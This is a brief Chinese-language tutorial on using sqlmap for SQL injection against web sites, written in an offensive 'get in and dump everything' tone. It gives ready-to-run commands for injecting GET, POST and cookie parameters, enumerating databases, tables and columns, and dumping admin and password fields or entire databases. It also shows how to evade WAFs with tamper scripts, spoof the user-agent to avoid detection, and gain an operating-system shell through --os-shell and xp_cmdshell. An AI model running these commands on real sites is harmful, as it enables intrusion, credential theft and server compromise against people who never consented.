sqlmap简易教程
注入分法不同,种类不同,来个简单的分类:
1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx”
2.post型: sqlmap -u “http://xxx.xx.xxx/xx.xxx” –data=”xxxx=xxxx&xxxx=xxx”
3.cookie类注入: sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx” –cookie=”xxx=xxx&xxx=xxx” –level=2
好,区分完毕再来后续的
数据库:–dbs
得到数据库名称xxx,需要表: -D xxx –tables
得到表名xxxx,需要段:-D xxx -T xxxx –columns
得到段内有admin,password,需要值:-D xxx -T xxxx -C “admin,password” –dump
绕waf –tamper=” "
注入被识别出来是工具,断开咋办**–user-agent=” "**
sqlmap自动跑post注入:
sqlmap -u “http://www.xxx.com/login.asp” –forms
post的注入点jjj=123:
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –dbs
数据库:
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –is-dba
看当前用户是不是dba:
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -a
(-a下面的那些命令是用来看用户,看主机,看权限的)
列子:
当权限还是挺高的,同时呢,跑出来了数据库名称kkk
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –tables
同时找到了网站路径,然后就又一次找到了sqlmap的牛逼的–os-xx系列命令,可以执行系统命令,同时还发现了牛逼的xpcmdshell –os-shell
以及很多牛逼的文件操作命令–file-xx 这些命令在需要用的时候使用就是了,会给你带来意想不到的惊喜
与此同时,发现tables里面没有想要的东西,决定把所有的数据库内容跑出来自己找,于是这么做:
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –dump-all
–batch 可以自动选择sqlmap默认选项